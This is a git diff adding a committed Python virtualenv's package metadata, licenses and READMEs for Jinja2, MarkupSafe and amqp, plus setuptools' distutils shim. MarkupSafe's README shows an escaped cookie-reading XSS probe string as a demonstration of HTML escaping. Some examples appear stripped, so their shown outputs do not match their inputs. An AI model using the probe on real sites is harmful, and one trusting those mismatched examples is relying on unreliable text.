diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/INSTALLER b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/LICENSE.rst b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/LICENSE.rst new file mode 100644 index 00000000..c37cae49 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2007 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/METADATA b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/METADATA new file mode 100644 index 00000000..f54bb5ca --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/METADATA @@ -0,0 +1,113 @@ +Metadata-Version: 2.1 +Name: Jinja2 +Version: 3.1.2 +Summary: A very fast and expressive template engine. +Home-page: https://palletsprojects.com/p/jinja/ +Author: Armin Ronacher +Author-email: armin.ronacher@active-4.com +Maintainer: Pallets +Maintainer-email: contact@palletsprojects.com +License: BSD-3-Clause +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Documentation, https://jinja.palletsprojects.com/ +Project-URL: Changes, https://jinja.palletsprojects.com/changes/ +Project-URL: Source Code, https://github.com/pallets/jinja/ +Project-URL: Issue Tracker, https://github.com/pallets/jinja/issues/ +Project-URL: Twitter, https://twitter.com/PalletsTeam +Project-URL: Chat, https://discord.gg/pallets +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content +Classifier: Topic :: Text Processing :: Markup :: HTML +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE.rst +Requires-Dist: MarkupSafe (>=2.0) +Provides-Extra: i18n +Requires-Dist: Babel (>=2.7) ; extra == 'i18n' + +Jinja +===== + +Jinja is a fast, expressive, extensible templating engine. Special +placeholders in the template allow writing code similar to Python +syntax. Then the template is passed data to render the final document. + +It includes: + +- Template inheritance and inclusion. +- Define and import macros within templates. +- HTML templates can use autoescaping to prevent XSS from untrusted + user input. +- A sandboxed environment can safely render untrusted templates. +- AsyncIO support for generating templates and calling async + functions. +- I18N support with Babel. +- Templates are compiled to optimized Python code just-in-time and + cached, or can be compiled ahead-of-time. +- Exceptions point to the correct line in templates to make debugging + easier. +- Extensible filters, tests, functions, and even syntax. + +Jinja's philosophy is that while application logic belongs in Python if +possible, it shouldn't make the template designer's job difficult by +restricting functionality too much. + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + $ pip install -U Jinja2 + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +In A Nutshell +------------- + +.. code-block:: jinja + + {% extends "base.html" %} + {% block title %}Members{% endblock %} + {% block content %} + + {% endblock %} + + +Donate +------ + +The Pallets organization develops and supports Jinja and other popular +packages. In order to grow the community of contributors and users, and +allow the maintainers to devote more time to the projects, `please +donate today`_. + +.. _please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://jinja.palletsprojects.com/ +- Changes: https://jinja.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/Jinja2/ +- Source Code: https://github.com/pallets/jinja/ +- Issue Tracker: https://github.com/pallets/jinja/issues/ +- Website: https://palletsprojects.com/p/jinja/ +- Twitter: https://twitter.com/PalletsTeam +- Chat: https://discord.gg/pallets + + diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/RECORD b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/RECORD new file mode 100644 index 00000000..af42ee3c --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/RECORD @@ -0,0 +1,58 @@ +Jinja2-3.1.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +Jinja2-3.1.2.dist-info/LICENSE.rst,sha256=O0nc7kEF6ze6wQ-vG-JgQI_oXSUrjp3y4JefweCUQ3s,1475 +Jinja2-3.1.2.dist-info/METADATA,sha256=PZ6v2SIidMNixR7MRUX9f7ZWsPwtXanknqiZUmRbh4U,3539 +Jinja2-3.1.2.dist-info/RECORD,, +Jinja2-3.1.2.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +Jinja2-3.1.2.dist-info/entry_points.txt,sha256=zRd62fbqIyfUpsRtU7EVIFyiu1tPwfgO7EvPErnxgTE,59 +Jinja2-3.1.2.dist-info/top_level.txt,sha256=PkeVWtLb3-CqjWi1fO29OCbj55EhX_chhKrCdrVe_zs,7 +jinja2/__init__.py,sha256=8vGduD8ytwgD6GDSqpYc2m3aU-T7PKOAddvVXgGr_Fs,1927 +jinja2/__pycache__/__init__.cpython-310.pyc,, +jinja2/__pycache__/_identifier.cpython-310.pyc,, +jinja2/__pycache__/async_utils.cpython-310.pyc,, +jinja2/__pycache__/bccache.cpython-310.pyc,, +jinja2/__pycache__/compiler.cpython-310.pyc,, +jinja2/__pycache__/constants.cpython-310.pyc,, +jinja2/__pycache__/debug.cpython-310.pyc,, +jinja2/__pycache__/defaults.cpython-310.pyc,, +jinja2/__pycache__/environment.cpython-310.pyc,, +jinja2/__pycache__/exceptions.cpython-310.pyc,, +jinja2/__pycache__/ext.cpython-310.pyc,, +jinja2/__pycache__/filters.cpython-310.pyc,, +jinja2/__pycache__/idtracking.cpython-310.pyc,, +jinja2/__pycache__/lexer.cpython-310.pyc,, +jinja2/__pycache__/loaders.cpython-310.pyc,, +jinja2/__pycache__/meta.cpython-310.pyc,, +jinja2/__pycache__/nativetypes.cpython-310.pyc,, +jinja2/__pycache__/nodes.cpython-310.pyc,, +jinja2/__pycache__/optimizer.cpython-310.pyc,, +jinja2/__pycache__/parser.cpython-310.pyc,, +jinja2/__pycache__/runtime.cpython-310.pyc,, +jinja2/__pycache__/sandbox.cpython-310.pyc,, +jinja2/__pycache__/tests.cpython-310.pyc,, +jinja2/__pycache__/utils.cpython-310.pyc,, +jinja2/__pycache__/visitor.cpython-310.pyc,, +jinja2/_identifier.py,sha256=_zYctNKzRqlk_murTNlzrju1FFJL7Va_Ijqqd7ii2lU,1958 +jinja2/async_utils.py,sha256=dHlbTeaxFPtAOQEYOGYh_PHcDT0rsDaUJAFDl_0XtTg,2472 +jinja2/bccache.py,sha256=mhz5xtLxCcHRAa56azOhphIAe19u1we0ojifNMClDio,14061 +jinja2/compiler.py,sha256=Gs-N8ThJ7OWK4-reKoO8Wh1ZXz95MVphBKNVf75qBr8,72172 +jinja2/constants.py,sha256=GMoFydBF_kdpaRKPoM5cl5MviquVRLVyZtfp5-16jg0,1433 +jinja2/debug.py,sha256=iWJ432RadxJNnaMOPrjIDInz50UEgni3_HKuFXi2vuQ,6299 +jinja2/defaults.py,sha256=boBcSw78h-lp20YbaXSJsqkAI2uN_mD_TtCydpeq5wU,1267 +jinja2/environment.py,sha256=6uHIcc7ZblqOMdx_uYNKqRnnwAF0_nzbyeMP9FFtuh4,61349 +jinja2/exceptions.py,sha256=ioHeHrWwCWNaXX1inHmHVblvc4haO7AXsjCp3GfWvx0,5071 +jinja2/ext.py,sha256=ivr3P7LKbddiXDVez20EflcO3q2aHQwz9P_PgWGHVqE,31502 +jinja2/filters.py,sha256=9js1V-h2RlyW90IhLiBGLM2U-k6SCy2F4BUUMgB3K9Q,53509 +jinja2/idtracking.py,sha256=GfNmadir4oDALVxzn3DL9YInhJDr69ebXeA2ygfuCGA,10704 +jinja2/lexer.py,sha256=DW2nX9zk-6MWp65YR2bqqj0xqCvLtD-u9NWT8AnFRxQ,29726 +jinja2/loaders.py,sha256=BfptfvTVpClUd-leMkHczdyPNYFzp_n7PKOJ98iyHOg,23207 +jinja2/meta.py,sha256=GNPEvifmSaU3CMxlbheBOZjeZ277HThOPUTf1RkppKQ,4396 +jinja2/nativetypes.py,sha256=DXgORDPRmVWgy034H0xL8eF7qYoK3DrMxs-935d0Fzk,4226 +jinja2/nodes.py,sha256=i34GPRAZexXMT6bwuf5SEyvdmS-bRCy9KMjwN5O6pjk,34550 +jinja2/optimizer.py,sha256=tHkMwXxfZkbfA1KmLcqmBMSaz7RLIvvItrJcPoXTyD8,1650 +jinja2/parser.py,sha256=nHd-DFHbiygvfaPtm9rcQXJChZG7DPsWfiEsqfwKerY,39595 +jinja2/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +jinja2/runtime.py,sha256=5CmD5BjbEJxSiDNTFBeKCaq8qU4aYD2v6q2EluyExms,33476 +jinja2/sandbox.py,sha256=Y0xZeXQnH6EX5VjaV2YixESxoepnRbW_3UeQosaBU3M,14584 +jinja2/tests.py,sha256=Am5Z6Lmfr2XaH_npIfJJ8MdXtWsbLjMULZJulTAj30E,5905 +jinja2/utils.py,sha256=u9jXESxGn8ATZNVolwmkjUVu4SA-tLgV0W7PcSfPfdQ,23965 +jinja2/visitor.py,sha256=MH14C6yq24G_KVtWzjwaI7Wg14PCJIYlWW1kpkxYak0,3568 diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/WHEEL b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/entry_points.txt b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/entry_points.txt new file mode 100644 index 00000000..7b9666c8 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/entry_points.txt @@ -0,0 +1,2 @@ +[babel.extractors] +jinja2 = jinja2.ext:babel_extract[i18n] diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/top_level.txt b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/top_level.txt new file mode 100644 index 00000000..7f7afbf3 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/top_level.txt @@ -0,0 +1 @@ +jinja2 diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/INSTALLER b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/LICENSE.rst b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/LICENSE.rst new file mode 100644 index 00000000..9d227a0c --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2010 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/METADATA b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/METADATA new file mode 100644 index 00000000..bced1652 --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/METADATA @@ -0,0 +1,93 @@ +Metadata-Version: 2.1 +Name: MarkupSafe +Version: 2.1.3 +Summary: Safely add untrusted strings to HTML/XML markup. +Home-page: https://palletsprojects.com/p/markupsafe/ +Maintainer: Pallets +Maintainer-email: contact@palletsprojects.com +License: BSD-3-Clause +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Documentation, https://markupsafe.palletsprojects.com/ +Project-URL: Changes, https://markupsafe.palletsprojects.com/changes/ +Project-URL: Source Code, https://github.com/pallets/markupsafe/ +Project-URL: Issue Tracker, https://github.com/pallets/markupsafe/issues/ +Project-URL: Chat, https://discord.gg/pallets +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content +Classifier: Topic :: Text Processing :: Markup :: HTML +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE.rst + +MarkupSafe +========== + +MarkupSafe implements a text object that escapes characters so it is +safe to use in HTML and XML. Characters that have special meanings are +replaced so that they display as the actual characters. This mitigates +injection attacks, meaning untrusted user input can safely be displayed +on a page. + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + pip install -U MarkupSafe + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +Examples +-------- + +.. code-block:: pycon + + >>> from markupsafe import Markup, escape + + >>> # escape replaces special characters and wraps in Markup + >>> escape("") + Markup('<script>alert(document.cookie);</script>') + + >>> # wrap in Markup to mark text "safe" and prevent escaping + >>> Markup("Hello") + Markup('hello') + + >>> escape(Markup("Hello")) + Markup('hello') + + >>> # Markup is a str subclass + >>> # methods and operators escape their arguments + >>> template = Markup("Hello {name}") + >>> template.format(name='"World"') + Markup('Hello "World"') + + +Donate +------ + +The Pallets organization develops and supports MarkupSafe and other +popular packages. In order to grow the community of contributors and +users, and allow the maintainers to devote more time to the projects, +`please donate today`_. + +.. _please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://markupsafe.palletsprojects.com/ +- Changes: https://markupsafe.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/MarkupSafe/ +- Source Code: https://github.com/pallets/markupsafe/ +- Issue Tracker: https://github.com/pallets/markupsafe/issues/ +- Chat: https://discord.gg/pallets diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/RECORD b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/RECORD new file mode 100644 index 00000000..36ba525e --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/RECORD @@ -0,0 +1,14 @@ +MarkupSafe-2.1.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +MarkupSafe-2.1.3.dist-info/LICENSE.rst,sha256=RjHsDbX9kKVH4zaBcmTGeYIUM4FG-KyUtKV_lu6MnsQ,1503 +MarkupSafe-2.1.3.dist-info/METADATA,sha256=5gU_TQw6eHpTaqkI6SPeZje6KTPlJPAV82uNiL3naKE,3096 +MarkupSafe-2.1.3.dist-info/RECORD,, +MarkupSafe-2.1.3.dist-info/WHEEL,sha256=yXMlTXjHPYBFmMOeF4b9ZM_ASRm_Q54GxZmxQGPAzx4,98 +MarkupSafe-2.1.3.dist-info/top_level.txt,sha256=qy0Plje5IJuvsCBjejJyhDCjEAdcDLK_2agVcex8Z6U,11 +markupsafe/__init__.py,sha256=GsRaSTjrhvg6c88PnPJNqm4MafU_mFatfXz4-h80-Qc,10642 +markupsafe/__pycache__/__init__.cpython-310.pyc,, +markupsafe/__pycache__/_native.cpython-310.pyc,, +markupsafe/_native.py,sha256=_Q7UsXCOvgdonCgqG3l5asANI6eo50EKnDM-mlwEC5M,1776 +markupsafe/_speedups.c,sha256=n3jzzaJwXcoN8nTFyA53f3vSqsWK2vujI-v6QYifjhQ,7403 +markupsafe/_speedups.cp310-win32.pyd,sha256=1TZY4zp7C-WOSFYX9S03L2KItr-g1v-GVmTDabNfvwU,13312 +markupsafe/_speedups.pyi,sha256=f5QtwIOP0eLrxh2v5p6SmaYmlcHIGIfmz0DovaqL0OU,238 +markupsafe/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/WHEEL b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/WHEEL new file mode 100644 index 00000000..dd35916d --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.40.0) +Root-Is-Purelib: false +Tag: cp310-cp310-win32 + diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/top_level.txt b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/top_level.txt new file mode 100644 index 00000000..75bf7292 --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/top_level.txt @@ -0,0 +1 @@ +markupsafe diff --git a/env/Lib/site-packages/_distutils_hack/__init__.py b/env/Lib/site-packages/_distutils_hack/__init__.py new file mode 100644 index 00000000..5f40996a --- /dev/null +++ b/env/Lib/site-packages/_distutils_hack/__init__.py @@ -0,0 +1,128 @@ +import sys +import os +import re +import importlib +import warnings + + +is_pypy = '__pypy__' in sys.builtin_module_names + + +warnings.filterwarnings('ignore', + r'.+ distutils\b.+ deprecated', + DeprecationWarning) + + +def warn_distutils_present(): + if 'distutils' not in sys.modules: + return + if is_pypy and sys.version_info < (3, 7): + # PyPy for 3.6 unconditionally imports distutils, so bypass the warning + # https://foss.heptapod.net/pypy/pypy/-/blob/be829135bc0d758997b3566062999ee8b23872b4/lib-python/3/site.py#L250 + return + warnings.warn( + "Distutils was imported before Setuptools, but importing Setuptools " + "also replaces the `distutils` module in `sys.modules`. This may lead " + "to undesirable behaviors or errors. To avoid these issues, avoid " + "using distutils directly, ensure that setuptools is installed in the " + "traditional way (e.g. not an editable install), and/or make sure " + "that setuptools is always imported before distutils.") + + +def clear_distutils(): + if 'distutils' not in sys.modules: + return + warnings.warn("Setuptools is replacing distutils.") + mods = [name for name in sys.modules if re.match(r'distutils\b', name)] + for name in mods: + del sys.modules[name] + + +def enabled(): + """ + Allow selection of distutils by environment variable. + """ + which = os.environ.get('SETUPTOOLS_USE_DISTUTILS', 'stdlib') + return which == 'local' + + +def ensure_local_distutils(): + clear_distutils() + distutils = importlib.import_module('setuptools._distutils') + distutils.__name__ = 'distutils' + sys.modules['distutils'] = distutils + + # sanity check that submodules load as expected + core = importlib.import_module('distutils.core') + assert '_distutils' in core.__file__, core.__file__ + + +def do_override(): + """ + Ensure that the local copy of distutils is preferred over stdlib. + + See https://github.com/pypa/setuptools/issues/417#issuecomment-392298401 + for more motivation. + """ + if enabled(): + warn_distutils_present() + ensure_local_distutils() + + +class DistutilsMetaFinder: + def find_spec(self, fullname, path, target=None): + if path is not None: + return + + method_name = 'spec_for_{fullname}'.format(**locals()) + method = getattr(self, method_name, lambda: None) + return method() + + def spec_for_distutils(self): + import importlib.abc + import importlib.util + + class DistutilsLoader(importlib.abc.Loader): + + def create_module(self, spec): + return importlib.import_module('setuptools._distutils') + + def exec_module(self, module): + pass + + return importlib.util.spec_from_loader('distutils', DistutilsLoader()) + + def spec_for_pip(self): + """ + Ensure stdlib distutils when running under pip. + See pypa/pip#8761 for rationale. + """ + if self.pip_imported_during_build(): + return + clear_distutils() + self.spec_for_distutils = lambda: None + + @staticmethod + def pip_imported_during_build(): + """ + Detect if pip is being imported in a build script. Ref #2355. + """ + import traceback + return any( + frame.f_globals['__file__'].endswith('setup.py') + for frame, line in traceback.walk_stack(None) + ) + + +DISTUTILS_FINDER = DistutilsMetaFinder() + + +def add_shim(): + sys.meta_path.insert(0, DISTUTILS_FINDER) + + +def remove_shim(): + try: + sys.meta_path.remove(DISTUTILS_FINDER) + except ValueError: + pass diff --git a/env/Lib/site-packages/_distutils_hack/override.py b/env/Lib/site-packages/_distutils_hack/override.py new file mode 100644 index 00000000..2cc433a4 --- /dev/null +++ b/env/Lib/site-packages/_distutils_hack/override.py @@ -0,0 +1 @@ +__import__('_distutils_hack').do_override() diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/INSTALLER b/env/Lib/site-packages/amqp-5.1.1.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/LICENSE b/env/Lib/site-packages/amqp-5.1.1.dist-info/LICENSE new file mode 100644 index 00000000..46087c2a --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/LICENSE @@ -0,0 +1,47 @@ +Copyright (c) 2015-2016 Ask Solem & contributors. All rights reserved. +Copyright (c) 2012-2014 GoPivotal, Inc. All rights reserved. +Copyright (c) 2009, 2010, 2011, 2012 Ask Solem, and individual contributors. All rights reserved. +Copyright (C) 2007-2008 Barry Pederson . All rights reserved. + +py-amqp is licensed under The BSD License (3 Clause, also known as +the new BSD license). The license is an OSI approved Open Source +license and is GPL-compatible(1). + +The license text can also be found here: +http://www.opensource.org/licenses/BSD-3-Clause + +License +======= + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of Ask Solem, nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Ask Solem OR CONTRIBUTORS +BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGE. + + +Footnotes +========= +(1) A GPL-compatible license makes it possible to + combine Celery with other software that is released + under the GPL, it does not mean that we're distributing + Celery under the GPL license. The BSD license, unlike the GPL, + let you distribute a modified version without making your + changes open source. diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/METADATA b/env/Lib/site-packages/amqp-5.1.1.dist-info/METADATA new file mode 100644 index 00000000..6cd9b35c --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/METADATA @@ -0,0 +1,241 @@ +Metadata-Version: 2.1 +Name: amqp +Version: 5.1.1 +Summary: Low-level AMQP client for Python (fork of amqplib). +Home-page: http://github.com/celery/py-amqp +Author: Barry Pederson +Author-email: pyamqp@celeryproject.org +Maintainer: Asif Saif Uddin, Matus Valo +License: BSD +Keywords: amqp rabbitmq cloudamqp messaging +Platform: any +Classifier: Development Status :: 5 - Production/Stable +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: License :: OSI Approved :: BSD License +Classifier: Intended Audience :: Developers +Classifier: Operating System :: OS Independent +Requires-Python: >=3.6 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: vine (>=5.0.0) + +===================================================================== + Python AMQP 0.9.1 client library +===================================================================== + +|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| + +:Version: 5.1.1 +:Web: https://amqp.readthedocs.io/ +:Download: https://pypi.org/project/amqp/ +:Source: http://github.com/celery/py-amqp/ +:Keywords: amqp, rabbitmq + +About +===== + +This is a fork of amqplib_ which was originally written by Barry Pederson. +It is maintained by the Celery_ project, and used by `kombu`_ as a pure python +alternative when `librabbitmq`_ is not available. + +This library should be API compatible with `librabbitmq`_. + +.. _amqplib: https://pypi.org/project/amqplib/ +.. _Celery: http://celeryproject.org/ +.. _kombu: https://kombu.readthedocs.io/ +.. _librabbitmq: https://pypi.org/project/librabbitmq/ + +Differences from `amqplib`_ +=========================== + +- Supports draining events from multiple channels (``Connection.drain_events``) +- Support for timeouts +- Channels are restored after channel error, instead of having to close the + connection. +- Support for heartbeats + + - ``Connection.heartbeat_tick(rate=2)`` must called at regular intervals + (half of the heartbeat value if rate is 2). + - Or some other scheme by using ``Connection.send_heartbeat``. +- Supports RabbitMQ extensions: + - Consumer Cancel Notifications + - by default a cancel results in ``ChannelError`` being raised + - but not if a ``on_cancel`` callback is passed to ``basic_consume``. + - Publisher confirms + - ``Channel.confirm_select()`` enables publisher confirms. + - ``Channel.events['basic_ack'].append(my_callback)`` adds a callback + to be called when a message is confirmed. This callback is then + called with the signature ``(delivery_tag, multiple)``. + - Exchange-to-exchange bindings: ``exchange_bind`` / ``exchange_unbind``. + - ``Channel.confirm_select()`` enables publisher confirms. + - ``Channel.events['basic_ack'].append(my_callback)`` adds a callback + to be called when a message is confirmed. This callback is then + called with the signature ``(delivery_tag, multiple)``. + - Authentication Failure Notifications + Instead of just closing the connection abruptly on invalid + credentials, py-amqp will raise an ``AccessRefused`` error + when connected to rabbitmq-server 3.2.0 or greater. +- Support for ``basic_return`` +- Uses AMQP 0-9-1 instead of 0-8. + - ``Channel.access_request`` and ``ticket`` arguments to methods + **removed**. + - Supports the ``arguments`` argument to ``basic_consume``. + - ``internal`` argument to ``exchange_declare`` removed. + - ``auto_delete`` argument to ``exchange_declare`` deprecated + - ``insist`` argument to ``Connection`` removed. + - ``Channel.alerts`` has been removed. + - Support for ``Channel.basic_recover_async``. + - ``Channel.basic_recover`` deprecated. +- Exceptions renamed to have idiomatic names: + - ``AMQPException`` -> ``AMQPError`` + - ``AMQPConnectionException`` -> ConnectionError`` + - ``AMQPChannelException`` -> ChannelError`` + - ``Connection.known_hosts`` removed. + - ``Connection`` no longer supports redirects. + - ``exchange`` argument to ``queue_bind`` can now be empty + to use the "default exchange". +- Adds ``Connection.is_alive`` that tries to detect + whether the connection can still be used. +- Adds ``Connection.connection_errors`` and ``.channel_errors``, + a list of recoverable errors. +- Exposes the underlying socket as ``Connection.sock``. +- Adds ``Channel.no_ack_consumers`` to keep track of consumer tags + that set the no_ack flag. +- Slightly better at error recovery + +Quick overview +============== + +Simple producer publishing messages to ``test`` queue using default exchange: + +.. code:: python + + 